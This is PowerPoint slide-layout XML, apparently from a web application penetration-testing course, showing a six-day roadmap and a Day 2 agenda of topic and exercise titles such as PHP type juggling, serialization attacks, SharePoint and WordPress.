                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B11116"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475488" y="1294490"/>
            <a:ext cx="5257800" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342891" indent="-342891" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Day 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" u="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Advanced Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342891" indent="-342891" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Day 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Web Frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342891" indent="-342891" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Day 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" u="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Web Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342891" indent="-342891" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Day 4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Alternative Web Interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342891" indent="-342891" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Day 5:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>WAFs and Filter Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342891" indent="-342891" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Day 6:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" u="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="5531644" y="2133582"/>
            <a:ext cx="366713" cy="365125"/>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3" name="Text Placeholder 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="475488"/>
            <a:ext cx="6019800" cy="5696712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9D9D9"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="365760" tIns="182880" bIns="182880"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="1600" b="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="14287" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="1600" b="0" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" charset="0"/>
                <a:ea typeface="Georgia" charset="0"/>
                <a:cs typeface="Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="14287" indent="0" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="1600" b="0" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" charset="0"/>
                <a:ea typeface="Georgia" charset="0"/>
                <a:cs typeface="Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="14287" indent="0" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="1600" b="0" i="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" charset="0"/>
                <a:ea typeface="Georgia" charset="0"/>
                <a:cs typeface="Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="14287" indent="0" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="1600" b="0" i="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" charset="0"/>
                <a:ea typeface="Georgia" charset="0"/>
                <a:cs typeface="Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514537" indent="-228594" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971726" indent="-228594" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3428914" indent="-228594" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886103" indent="-228594" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web Architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  Web Design Patterns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" baseline="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exercise: Mass Assignment in CakePHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" baseline="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Languages and Frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" baseline="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  Java and Struts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" baseline="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  PHP Type Juggling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" baseline="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  Exercise: Authentication Bypass with Type Juggling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0">
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" baseline="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Logic Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" baseline="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  Attacking Object Serialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" baseline="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  The MEAN Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" baseline="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  Exercise: MEAN Stack Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0">
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Content Management Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  SharePoint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  Exercise:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" baseline="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SharePoint</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0">
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" baseline="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  WordPress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" baseline="0" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  Exercise: WordPress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0">
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2037273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ans_single-text_subtitle">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="475840"/>
            <a:ext cx="11247120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B11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655320" y="475841"/>
            <a:ext cx="10881360" cy="685800"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="B11116"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="22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55320" y="1499777"/>
            <a:ext cx="10881360" cy="589935"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2800" b="1" i="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans M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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2245617"/>
            <a:ext cx="10881360" cy="37172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3324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sans_two-column-text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="475840"/>
            <a:ext cx="11247120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B11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655320" y="475839"/>
            <a:ext cx="10881360" cy="685801"/>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655320" y="1519086"/>
            <a:ext cx="5364480" cy="45841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519086"/>
            <a:ext cx="5364480" cy="4584137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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0455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sans_two-column-text_subtitle">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="475840"/>
            <a:ext cx="11247120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B11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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655320" y="475840"/>
            <a:ext cx="10881360" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>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655320" y="1445342"/>
            <a:ext cx="5342255" cy="923207"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT"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55320" y="2505075"/>
            <a:ext cx="5342255"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445343"/>
            <a:ext cx="5364480" cy="937496"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0">
